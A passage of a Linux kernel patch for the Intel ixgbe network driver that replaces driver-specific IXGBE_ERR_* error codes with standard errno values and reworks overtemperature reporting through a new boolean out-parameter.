+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h b/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
+index 2b00db92b08f5..61b9774b3d31e 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
+@@ -3509,10 +3509,10 @@ struct ixgbe_phy_operations {
+ 	s32 (*read_i2c_sff8472)(struct ixgbe_hw *, u8 , u8 *);
+ 	s32 (*read_i2c_eeprom)(struct ixgbe_hw *, u8 , u8 *);
+ 	s32 (*write_i2c_eeprom)(struct ixgbe_hw *, u8, u8);
+-	s32 (*check_overtemp)(struct ixgbe_hw *);
++	bool (*check_overtemp)(struct ixgbe_hw *);
+ 	s32 (*set_phy_power)(struct ixgbe_hw *, bool on);
+ 	s32 (*enter_lplu)(struct ixgbe_hw *);
+-	s32 (*handle_lasi)(struct ixgbe_hw *hw);
++	s32 (*handle_lasi)(struct ixgbe_hw *hw, bool *);
+ 	s32 (*read_i2c_byte_unlocked)(struct ixgbe_hw *, u8 offset, u8 addr,
+ 				      u8 *value);
+ 	s32 (*write_i2c_byte_unlocked)(struct ixgbe_hw *, u8 offset, u8 addr,
+@@ -3665,45 +3665,6 @@ struct ixgbe_info {
+ 	const u32			*mvals;
+ };
+ 
+-
+-/* Error Codes */
+-#define IXGBE_ERR_EEPROM                        -1
+-#define IXGBE_ERR_EEPROM_CHECKSUM               -2
+-#define IXGBE_ERR_PHY                           -3
+-#define IXGBE_ERR_CONFIG                        -4
+-#define IXGBE_ERR_PARAM                         -5
+-#define IXGBE_ERR_MAC_TYPE                      -6
+-#define IXGBE_ERR_UNKNOWN_PHY                   -7
+-#define IXGBE_ERR_LINK_SETUP                    -8
+-#define IXGBE_ERR_ADAPTER_STOPPED               -9
+-#define IXGBE_ERR_INVALID_MAC_ADDR              -10
+-#define IXGBE_ERR_DEVICE_NOT_SUPPORTED          -11
+-#define IXGBE_ERR_PRIMARY_REQUESTS_PENDING      -12
+-#define IXGBE_ERR_INVALID_LINK_SETTINGS         -13
+-#define IXGBE_ERR_AUTONEG_NOT_COMPLETE          -14
+-#define IXGBE_ERR_RESET_FAILED                  -15
+-#define IXGBE_ERR_SWFW_SYNC                     -16
+-#define IXGBE_ERR_PHY_ADDR_INVALID              -17
+-#define IXGBE_ERR_I2C                           -18
+-#define IXGBE_ERR_SFP_NOT_SUPPORTED             -19
+-#define IXGBE_ERR_SFP_NOT_PRESENT               -20
+-#define IXGBE_ERR_SFP_NO_INIT_SEQ_PRESENT       -21
+-#define IXGBE_ERR_NO_SAN_ADDR_PTR               -22
+-#define IXGBE_ERR_FDIR_REINIT_FAILED            -23
+-#define IXGBE_ERR_EEPROM_VERSION                -24
+-#define IXGBE_ERR_NO_SPACE                      -25
+-#define IXGBE_ERR_OVERTEMP                      -26
+-#define IXGBE_ERR_FC_NOT_NEGOTIATED             -27
+-#define IXGBE_ERR_FC_NOT_SUPPORTED              -28
+-#define IXGBE_ERR_SFP_SETUP_NOT_COMPLETE        -30
+-#define IXGBE_ERR_PBA_SECTION                   -31
+-#define IXGBE_ERR_INVALID_ARGUMENT              -32
+-#define IXGBE_ERR_HOST_INTERFACE_COMMAND        -33
+-#define IXGBE_ERR_FDIR_CMD_INCOMPLETE		-38
+-#define IXGBE_ERR_FW_RESP_INVALID		-39
+-#define IXGBE_ERR_TOKEN_RETRY			-40
+-#define IXGBE_NOT_IMPLEMENTED                   0x7FFFFFFF
+-
+ #define IXGBE_FUSES0_GROUP(_i)		(0x11158 + ((_i) * 4))
+ #define IXGBE_FUSES0_300MHZ		BIT(5)
+ #define IXGBE_FUSES0_REV_MASK		(3u << 6)
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_x540.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_x540.c
+index d5cfb51ff648d..15325c549d9b5 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_x540.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_x540.c
+@@ -84,7 +84,7 @@ mac_reset_top:
+ 	status = hw->mac.ops.acquire_swfw_sync(hw, swfw_mask);
+ 	if (status) {
+ 		hw_dbg(hw, "semaphore failed with %d", status);
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 
+ 	ctrl = IXGBE_CTRL_RST;
+@@ -103,7 +103,7 @@ mac_reset_top:
+ 	}
+ 
+ 	if (ctrl & IXGBE_CTRL_RST_MASK) {
+-		status = IXGBE_ERR_RESET_FAILED;
++		status = -EIO;
+ 		hw_dbg(hw, "Reset polling failed to complete.\n");
+ 	}
+ 	msleep(100);
+@@ -220,7 +220,7 @@ static s32 ixgbe_read_eerd_X540(struct ixgbe_hw *hw, u16 offset, u16 *data)
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_read_eerd_generic(hw, offset, data);
+ 
+@@ -243,7 +243,7 @@ static s32 ixgbe_read_eerd_buffer_X540(struct ixgbe_hw *hw,
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_read_eerd_buffer_generic(hw, offset, words, data);
+ 
+@@ -264,7 +264,7 @@ static s32 ixgbe_write_eewr_X540(struct ixgbe_hw *hw, u16 offset, u16 data)
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_write_eewr_generic(hw, offset, data);
+ 
+@@ -287,7 +287,7 @@ static s32 ixgbe_write_eewr_buffer_X540(struct ixgbe_hw *hw,
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_write_eewr_buffer_generic(hw, offset, words, data);
+ 
+@@ -324,7 +324,7 @@ static s32 ixgbe_calc_eeprom_checksum_X540(struct ixgbe_hw *hw)
+ 	for (i = 0; i < checksum_last_word; i++) {
+ 		if (ixgbe_read_eerd_generic(hw, i, &word)) {
+ 			hw_dbg(hw, "EEPROM read failed\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 		checksum += word;
+ 	}
+@@ -349,7 +349,7 @@ static s32 ixgbe_calc_eeprom_checksum_X540(struct ixgbe_hw *hw)
+ 
+ 		if (ixgbe_read_eerd_generic(hw, pointer, &length)) {
+ 			hw_dbg(hw, "EEPROM read failed\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 
+ 		/* Skip pointer section if length is invalid. */
+@@ -360,7 +360,7 @@ static s32 ixgbe_calc_eeprom_checksum_X540(struct ixgbe_hw *hw)
+ 		for (j = pointer + 1; j <= pointer + length; j++) {
+ 			if (ixgbe_read_eerd_generic(hw, j, &word)) {
+ 				hw_dbg(hw, "EEPROM read failed\n");
+-				return IXGBE_ERR_EEPROM;
++				return -EIO;
+ 			}
+ 			checksum += word;
+ 		}
+@@ -397,7 +397,7 @@ static s32 ixgbe_validate_eeprom_checksum_X540(struct ixgbe_hw *hw,
+ 	}
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = hw->eeprom.ops.calc_checksum(hw);
+ 	if (status < 0)
+@@ -418,7 +418,7 @@ static s32 ixgbe_validate_eeprom_checksum_X540(struct ixgbe_hw *hw,
+ 	 */
+ 	if (read_checksum != checksum) {
+ 		hw_dbg(hw, "Invalid EEPROM checksum");
+-		status = IXGBE_ERR_EEPROM_CHECKSUM;
++		status = -EIO;
+ 	}
+ 
+ 	/* If the user cares, return the calculated checksum */
+@@ -455,7 +455,7 @@ static s32 ixgbe_update_eeprom_checksum_X540(struct ixgbe_hw *hw)
+ 	}
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return  IXGBE_ERR_SWFW_SYNC;
++		return  -EBUSY;
+ 
+ 	status = hw->eeprom.ops.calc_checksum(hw);
+ 	if (status < 0)
+@@ -490,7 +490,7 @@ static s32 ixgbe_update_flash_X540(struct ixgbe_hw *hw)
+ 	s32 status;
+ 
+ 	status = ixgbe_poll_flash_update_done_X540(hw);
+-	if (status == IXGBE_ERR_EEPROM) {
++	if (status == -EIO) {
+ 		hw_dbg(hw, "Flash update time out\n");
+ 		return status;
+ 	}
+@@ -540,7 +540,7 @@ static s32 ixgbe_poll_flash_update_done_X540(struct ixgbe_hw *hw)
+ 			return 0;
+ 		udelay(5);
+ 	}
+-	return IXGBE_ERR_EEPROM;
++	return -EIO;
+ }
+ 
+ /**
+@@ -575,7 +575,7 @@ s32 ixgbe_acquire_swfw_sync_X540(struct ixgbe_hw *hw, u32 mask)
+ 		 * SW_FW_SYNC bits (not just NVM)
+ 		 */
+ 		if (ixgbe_get_swfw_sync_semaphore(hw))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		swfw_sync = IXGBE_READ_REG(hw, IXGBE_SWFW_SYNC(hw));
+ 		if (!(swfw_sync & (fwmask | swmask | hwmask))) {
+@@ -599,7 +599,7 @@ s32 ixgbe_acquire_swfw_sync_X540(struct ixgbe_hw *hw, u32 mask)
+ 	 * bits in the SW_FW_SYNC register.
+ 	 */
+ 	if (ixgbe_get_swfw_sync_semaphore(hw))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	swfw_sync = IXGBE_READ_REG(hw, IXGBE_SWFW_SYNC(hw));
+ 	if (swfw_sync & (fwmask | hwmask)) {
+ 		swfw_sync |= swmask;
+@@ -622,11 +622,11 @@ s32 ixgbe_acquire_swfw_sync_X540(struct ixgbe_hw *hw, u32 mask)
+ 			rmask |= IXGBE_GSSR_I2C_MASK;
+ 		ixgbe_release_swfw_sync_X540(hw, rmask);
+ 		ixgbe_release_swfw_sync_semaphore(hw);
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 	ixgbe_release_swfw_sync_semaphore(hw);
+ 
+-	return IXGBE_ERR_SWFW_SYNC;
++	return -EBUSY;
+ }
+ 
+ /**
+@@ -680,7 +680,7 @@ static s32 ixgbe_get_swfw_sync_semaphore(struct ixgbe_hw *hw)
+ 	if (i == timeout) {
+ 		hw_dbg(hw,
+ 		       "Software semaphore SMBI between device drivers not granted.\n");
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	/* Now get the semaphore between SW/FW through the REGSMP bit */
+@@ -697,7 +697,7 @@ static s32 ixgbe_get_swfw_sync_semaphore(struct ixgbe_hw *hw)
+ 	 */
+ 	hw_dbg(hw, "REGSMP Software NVM semaphore not granted\n");
+ 	ixgbe_release_swfw_sync_semaphore(hw);
+-	return IXGBE_ERR_EEPROM;
++	return -EIO;
+ }
+ 
+ /**
+@@ -768,7 +768,7 @@ s32 ixgbe_blink_led_start_X540(struct ixgbe_hw *hw, u32 index)
+ 	bool link_up;
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* Link should be up in order for the blink bit in the LED control
+ 	 * register to work. Force link and speed in the MAC if link is down.
+@@ -804,7 +804,7 @@ s32 ixgbe_blink_led_stop_X540(struct ixgbe_hw *hw, u32 index)
+ 	u32 ledctl_reg;
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* Restore the LED to its default value. */
+ 	ledctl_reg = IXGBE_READ_REG(hw, IXGBE_LEDCTL);
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+index aa4bf6c9a2f7c..cdc912bba8089 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+@@ -206,13 +206,13 @@ static s32 ixgbe_reset_cs4227(struct ixgbe_hw *hw)
+ 	}
+ 	if (retry == IXGBE_CS4227_RETRIES) {
+ 		hw_err(hw, "CS4227 reset did not complete\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	status = ixgbe_read_cs4227(hw, IXGBE_CS4227_EEPROM_STATUS, &value);
+ 	if (status || !(value & IXGBE_CS4227_EEPROM_LOAD_OK)) {
+ 		hw_err(hw, "CS4227 EEPROM did not load successfully\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -350,13 +350,13 @@ static s32 ixgbe_identify_phy_x550em(struct ixgbe_hw *hw)
+ static s32 ixgbe_read_phy_reg_x550em(struct ixgbe_hw *hw, u32 reg_addr,
+ 				     u32 device_type, u16 *phy_data)
+ {
+-	return IXGBE_NOT_IMPLEMENTED;
++	return -EOPNOTSUPP;
+ }
+ 
+ static s32 ixgbe_write_phy_reg_x550em(struct ixgbe_hw *hw, u32 reg_addr,
+ 				      u32 device_type, u16 phy_data)
+ {
+-	return IXGBE_NOT_IMPLEMENTED;
++	return -EOPNOTSUPP;
+ }
+ 
+ /**
+@@ -463,7 +463,7 @@ s32 ixgbe_fw_phy_activity(struct ixgbe_hw *hw, u16 activity,
+ 		--retries;
+ 	} while (retries > 0);
+ 
+-	return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++	return -EIO;
+ }
+ 
+ static const struct {
+@@ -511,7 +511,7 @@ static s32 ixgbe_get_phy_id_fw(struct ixgbe_hw *hw)
+ 	hw->phy.id |= phy_id_lo & IXGBE_PHY_REVISION_MASK;
+ 	hw->phy.revision = phy_id_lo & ~IXGBE_PHY_REVISION_MASK;
+ 	if (!hw->phy.id || hw->phy.id == IXGBE_PHY_REVISION_MASK)
+-		return IXGBE_ERR_PHY_ADDR_INVALID;
++		return -EFAULT;
+ 
+ 	hw->phy.autoneg_advertised = hw->phy.speeds_supported;
+ 	hw->phy.eee_speeds_supported = IXGBE_LINK_SPEED_100_FULL |
+@@ -568,7 +568,7 @@ static s32 ixgbe_setup_fw_link(struct ixgbe_hw *hw)
+ 
+ 	if (hw->fc.strict_ieee && hw->fc.requested_mode == ixgbe_fc_rx_pause) {
+ 		hw_err(hw, "rx_pause not valid in strict IEEE mode\n");
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	switch (hw->fc.requested_mode) {
+@@ -600,8 +600,10 @@ static s32 ixgbe_setup_fw_link(struct ixgbe_hw *hw)
+ 	rc = ixgbe_fw_phy_activity(hw, FW_PHY_ACT_SETUP_LINK, &setup);
+ 	if (rc)
+ 		return rc;
++
+ 	if (setup[0] == FW_PHY_ACT_SETUP_LINK_RSP_DOWN)
+-		return IXGBE_ERR_OVERTEMP;
++		return -EIO;
++
+ 	return 0;
+ }
+ 
+@@ -675,7 +677,7 @@ static s32 ixgbe_iosf_wait(struct ixgbe_hw *hw, u32 *ctrl)
+ 		*ctrl = command;
+ 	if (i == IXGBE_MDIO_COMMAND_TIMEOUT) {
+ 		hw_dbg(hw, "IOSF wait timed out\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -715,7 +717,8 @@ static s32 ixgbe_read_iosf_sb_reg_x550(struct ixgbe_hw *hw, u32 reg_addr,
+ 		error = (command & IXGBE_SB_IOSF_CTRL_CMPL_ERR_MASK) >>
+ 			 IXGBE_SB_IOSF_CTRL_CMPL_ERR_SHIFT;
+ 		hw_dbg(hw, "Failed to read, error %x\n", error);
+-		return IXGBE_ERR_PHY;
++		ret = -EIO;
++		goto out;
+ 	}
+ 
+ 	if (!ret)
+@@ -750,9 +753,9 @@ static s32 ixgbe_get_phy_token(struct ixgbe_hw *hw)
+ 	if (token_cmd.hdr.cmd_or_resp.ret_status == FW_PHY_TOKEN_OK)
+ 		return 0;
+ 	if (token_cmd.hdr.cmd_or_resp.ret_status != FW_PHY_TOKEN_RETRY)
+-		return IXGBE_ERR_FW_RESP_INVALID;
++		return -EIO;
+ 
+-	return IXGBE_ERR_TOKEN_RETRY;
++	return -EAGAIN;
+ }
+ 
+ /**
+@@ -778,7 +781,7 @@ static s32 ixgbe_put_phy_token(struct ixgbe_hw *hw)
+ 		return status;
+ 	if (token_cmd.hdr.cmd_or_resp.ret_status == FW_PHY_TOKEN_OK)
+ 		return 0;
+-	return IXGBE_ERR_FW_RESP_INVALID;
++	return -EIO;
+ }
+ 
+ /**
+@@ -942,7 +945,7 @@ static s32 ixgbe_checksum_ptr_x550(struct ixgbe_hw *hw, u16 ptr,
+ 		local_buffer = buf;
+ 	} else {
+ 		if (buffer_size < ptr)
+-			return  IXGBE_ERR_PARAM;
++			return  -EINVAL;
+ 		local_buffer = &buffer[ptr];
+ 	}
+ 
+@@ -960,7 +963,7 @@ static s32 ixgbe_checksum_ptr_x550(struct ixgbe_hw *hw, u16 ptr,
+ 	}
+ 
+ 	if (buffer && ((u32)start + (u32)length > buffer_size))
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	for (i = start; length; i++, length--) {
+ 		if (i == bufsz && !buffer) {
+@@ -1012,7 +1015,7 @@ static s32 ixgbe_calc_checksum_X550(struct ixgbe_hw *hw, u16 *buffer,
+ 		local_buffer = eeprom_ptrs;
+ 	} else {
+ 		if (buffer_size < IXGBE_EEPROM_LAST_WORD)
+-			return IXGBE_ERR_PARAM;
++			return -EINVAL;
+ 		local_buffer = buffer;
+ 	}
+ 
+@@ -1148,7 +1151,7 @@ static s32 ixgbe_validate_eeprom_checksum_X550(struct ixgbe_hw *hw,
+ 	 * calculated checksum
+ 	 */
+ 	if (read_checksum != checksum) {
+-		status = IXGBE_ERR_EEPROM_CHECKSUM;
++		status = -EIO;
+ 		hw_dbg(hw, "Invalid EEPROM checksum");
+ 	}
+ 
+@@ -1203,7 +1206,7 @@ static s32 ixgbe_write_ee_hostif_X550(struct ixgbe_hw *hw, u16 offset, u16 data)
+ 		hw->mac.ops.release_swfw_sync(hw, IXGBE_GSSR_EEP_SM);
+ 	} else {
+ 		hw_dbg(hw, "write ee hostif failed to get semaphore");
+-		status = IXGBE_ERR_SWFW_SYNC;
++		status = -EBUSY;
+ 	}
+ 
+ 	return status;
+@@ -1415,7 +1418,7 @@ static s32 ixgbe_write_iosf_sb_reg_x550(struct ixgbe_hw *hw, u32 reg_addr,
+ 		error = (command & IXGBE_SB_IOSF_CTRL_CMPL_ERR_MASK) >>
+ 			 IXGBE_SB_IOSF_CTRL_CMPL_ERR_SHIFT;
+ 		hw_dbg(hw, "Failed to write, error %x\n", error);
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ out:
+@@ -1558,7 +1561,7 @@ static s32 ixgbe_setup_ixfi_x550em(struct ixgbe_hw *hw, ixgbe_link_speed *speed)
+ 
+ 	/* iXFI is only supported with X552 */
+ 	if (mac->type != ixgbe_mac_X550EM_x)
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EIO;
+ 
+ 	/* Disable AN and force speed to 10G Serial. */
+ 	status = ixgbe_read_iosf_sb_reg_x550(hw,
+@@ -1580,7 +1583,7 @@ static s32 ixgbe_setup_ixfi_x550em(struct ixgbe_hw *hw, ixgbe_link_speed *speed)
+ 		break;
+ 	default:
+ 		/* Other link speeds are not supported by internal KR PHY. */
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EINVAL;
+ 	}
+ 
+ 	status = ixgbe_write_iosf_sb_reg_x550(hw,
+@@ -1611,7 +1614,7 @@ static s32 ixgbe_supported_sfp_modules_X550em(struct ixgbe_hw *hw, bool *linear)
+ {
+ 	switch (hw->phy.sfp_type) {
+ 	case ixgbe_sfp_type_not_present:
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 	case ixgbe_sfp_type_da_cu_core0:
+ 	case ixgbe_sfp_type_da_cu_core1:
+ 		*linear = true;
+@@ -1630,7 +1633,7 @@ static s32 ixgbe_supported_sfp_modules_X550em(struct ixgbe_hw *hw, bool *linear)
+ 	case ixgbe_sfp_type_1g_cu_core0:
+ 	case ixgbe_sfp_type_1g_cu_core1:
+ 	default:
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	return 0;
+@@ -1660,7 +1663,7 @@ ixgbe_setup_mac_link_sfp_x550em(struct ixgbe_hw *hw,
+ 	 * there is no reason to configure CS4227 and SFP not present error is
+ 	 * not accepted in the setup MAC link flow.
+ 	 */
+-	if (status == IXGBE_ERR_SFP_NOT_PRESENT)
++	if (status == -ENOENT)
+ 		return 0;
+ 
+ 	if (status)
+@@ -1718,7 +1721,7 @@ static s32 ixgbe_setup_sfi_x550a(struct ixgbe_hw *hw, ixgbe_link_speed *speed)
+ 		break;
+ 	default:
+ 		/* Other link speeds are not supported by internal PHY. */
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EINVAL;
+ 	}
+ 
+ 	(void)mac->ops.write_iosf_sb_reg(hw,
+@@ -1803,7 +1806,7 @@ ixgbe_setup_mac_link_sfp_n(struct ixgbe_hw *hw, ixgbe_link_speed speed,
+ 	/* If no SFP module present, then return success. Return success since
+ 	 * SFP not present error is not excepted in the setup MAC link flow.
+ 	 */
+-	if (ret_val == IXGBE_ERR_SFP_NOT_PRESENT)
++	if (ret_val == -ENOENT)
+ 		return 0;
+ 
+ 	if (ret_val)
+@@ -1853,7 +1856,7 @@ ixgbe_setup_mac_link_sfp_x550a(struct ixgbe_hw *hw, ixgbe_link_speed speed,
+ 	/* If no SFP module present, then return success. Return success since
+	 * SFP not present error is not accepted in the setup MAC link flow.
+ 	 */
+-	if (ret_val == IXGBE_ERR_SFP_NOT_PRESENT)
++	if (ret_val == -ENOENT)
+ 		return 0;
+ 
+ 	if (ret_val)
+@@ -1863,7 +1866,7 @@ ixgbe_setup_mac_link_sfp_x550a(struct ixgbe_hw *hw, ixgbe_link_speed speed,
+ 	ixgbe_setup_kr_speed_x550em(hw, speed);
+ 
+ 	if (hw->phy.mdio.prtad == MDIO_PRTAD_NONE)
+-		return IXGBE_ERR_PHY_ADDR_INVALID;
++		return -EFAULT;
+ 
+ 	/* Get external PHY SKU id */
+ 	ret_val = hw->phy.ops.read_reg(hw, IXGBE_CS4227_EFUSE_PDF_SKU,
+@@ -1962,7 +1965,7 @@ static s32 ixgbe_check_link_t_X550em(struct ixgbe_hw *hw,
+ 	u16 i, autoneg_status;
+ 
+ 	if (hw->mac.ops.get_media_type(hw) != ixgbe_media_type_copper)
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 
+ 	status = ixgbe_check_mac_link_generic(hw, speed, link_up,
+ 					      link_up_wait_to_complete);
+@@ -2145,9 +2148,9 @@ static s32 ixgbe_setup_sgmii_fw(struct ixgbe_hw *hw, ixgbe_link_speed speed,
+  */
+ static void ixgbe_fc_autoneg_sgmii_x550em_a(struct ixgbe_hw *hw)
+ {
+-	s32 status = IXGBE_ERR_FC_NOT_NEGOTIATED;
+ 	u32 info[FW_PHY_ACT_DATA_COUNT] = { 0 };
+ 	ixgbe_link_speed speed;
++	s32 status = -EIO;
+ 	bool link_up;
+ 
+ 	/* AN should have completed when the cable was plugged in.
+@@ -2165,7 +2168,7 @@ static void ixgbe_fc_autoneg_sgmii_x550em_a(struct ixgbe_hw *hw)
+ 	/* Check if auto-negotiation has completed */
+ 	status = ixgbe_fw_phy_activity(hw, FW_PHY_ACT_GET_LINK_INFO, &info);
+ 	if (status || !(info[0] & FW_PHY_ACT_GET_LINK_INFO_AN_COMPLETE)) {
+-		status = IXGBE_ERR_FC_NOT_NEGOTIATED;
++		status = -EIO;
+ 		goto out;
+ 	}
+ 
+@@ -2369,18 +2372,18 @@ static s32 ixgbe_get_link_capabilities_X550em(struct ixgbe_hw *hw,
+  * @hw: pointer to hardware structure
+  * @lsc: pointer to boolean flag which indicates whether external Base T
+  *	 PHY interrupt is lsc
++ * @is_overtemp: indicates whether an overtemp event was encountered
+  *
+ *  Determine if external Base T PHY interrupt cause is high temperature
+  * failure alarm or link status change.
+- *
+- * Return IXGBE_ERR_OVERTEMP if interrupt is high temperature
+- * failure alarm, else return PHY access status.
+  **/
+-static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc)
++static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc,
++				       bool *is_overtemp)
+ {
+ 	u32 status;
+ 	u16 reg;
+ 
++	*is_overtemp = false;
+ 	*lsc = false;
+ 
+ 	/* Vendor alarm triggered */
+@@ -2412,7 +2415,8 @@ static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc)
+ 	if (reg & IXGBE_MDIO_GLOBAL_ALM_1_HI_TMP_FAIL) {
+ 		/* power down the PHY in case the PHY FW didn't already */
+ 		ixgbe_set_copper_phy_power(hw, false);
+-		return IXGBE_ERR_OVERTEMP;
++		*is_overtemp = true;
++		return -EIO;
+ 	}
+ 	if (reg & IXGBE_MDIO_GLOBAL_ALM_1_DEV_FAULT) {
+ 		/*  device fault alarm triggered */
+@@ -2426,7 +2430,8 @@ static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc)
+ 		if (reg == IXGBE_MDIO_GLOBAL_FAULT_MSG_HI_TMP) {
+ 			/* power down the PHY in case the PHY FW didn't */
+ 			ixgbe_set_copper_phy_power(hw, false);
+-			return IXGBE_ERR_OVERTEMP;
++			*is_overtemp = true;
++			return -EIO;
+ 		}
+ 	}
+ 
+@@ -2462,12 +2467,12 @@ static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc)
+  **/
+ static s32 ixgbe_enable_lasi_ext_t_x550em(struct ixgbe_hw *hw)
+ {
++	bool lsc, overtemp;
+ 	u32 status;
+ 	u16 reg;
+-	bool lsc;
+ 
+ 	/* Clear interrupt flags */
+-	status = ixgbe_get_lasi_ext_t_x550em(hw, &lsc);
++	status = ixgbe_get_lasi_ext_t_x550em(hw, &lsc, &overtemp);
+ 
+ 	/* Enable link status change alarm */
+ 
+@@ -2546,21 +2551,20 @@ static s32 ixgbe_enable_lasi_ext_t_x550em(struct ixgbe_hw *hw)
+ /**
+  * ixgbe_handle_lasi_ext_t_x550em - Handle external Base T PHY interrupt
+  * @hw: pointer to hardware structure
++ * @is_overtemp: indicates whether an overtemp event was encountered
+  *
+  * Handle external Base T PHY interrupt. If high temperature
+  * failure alarm then return error, else if link status change
+  * then setup internal/external PHY link
+- *
+- * Return IXGBE_ERR_OVERTEMP if interrupt is high temperature
+- * failure alarm, else return PHY access status.
+  **/
+-static s32 ixgbe_handle_lasi_ext_t_x550em(struct ixgbe_hw *hw)
++static s32 ixgbe_handle_lasi_ext_t_x550em(struct ixgbe_hw *hw,
++					  bool *is_overtemp)
+ {
+ 	struct ixgbe_phy_info *phy = &hw->phy;
+ 	bool lsc;
+ 	u32 status;
+ 
+-	status = ixgbe_get_lasi_ext_t_x550em(hw, &lsc);
++	status = ixgbe_get_lasi_ext_t_x550em(hw, &lsc, is_overtemp);
+ 	if (status)
+ 		return status;
+ 
+@@ -2692,7 +2696,7 @@ static s32 ixgbe_setup_internal_phy_t_x550em(struct ixgbe_hw *hw)
+ 	u16 speed;
+ 
+ 	if (hw->mac.ops.get_media_type(hw) != ixgbe_media_type_copper)
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 
+ 	if (!(hw->mac.type == ixgbe_mac_X550EM_x &&
+ 	      !(hw->phy.nw_mng_if_sel & IXGBE_NW_MNG_IF_SEL_INT_PHY_MODE))) {
+@@ -2735,7 +2739,7 @@ static s32 ixgbe_setup_internal_phy_t_x550em(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		/* Internal PHY does not support anything else */
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	return ixgbe_setup_ixfi_x550em(hw, &force_speed);
+@@ -2767,7 +2771,7 @@ static s32 ixgbe_led_on_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+ 	u16 phy_data;
+ 
+ 	if (led_idx >= IXGBE_X557_MAX_LED_INDEX)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* To turn on the LED, set mode to ON. */
+ 	hw->phy.ops.read_reg(hw, IXGBE_X557_LED_PROVISIONING + led_idx,
+@@ -2789,7 +2793,7 @@ static s32 ixgbe_led_off_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+ 	u16 phy_data;
+ 
+ 	if (led_idx >= IXGBE_X557_MAX_LED_INDEX)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* To turn on the LED, set mode to ON. */
+ 	hw->phy.ops.read_reg(hw, IXGBE_X557_LED_PROVISIONING + led_idx,
+@@ -2813,8 +2817,9 @@ static s32 ixgbe_led_off_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+  *
+  *  Sends driver version number to firmware through the manageability
+  *  block.  On success return 0
+- *  else returns IXGBE_ERR_SWFW_SYNC when encountering an error acquiring
+- *  semaphore or IXGBE_ERR_HOST_INTERFACE_COMMAND when command fails.
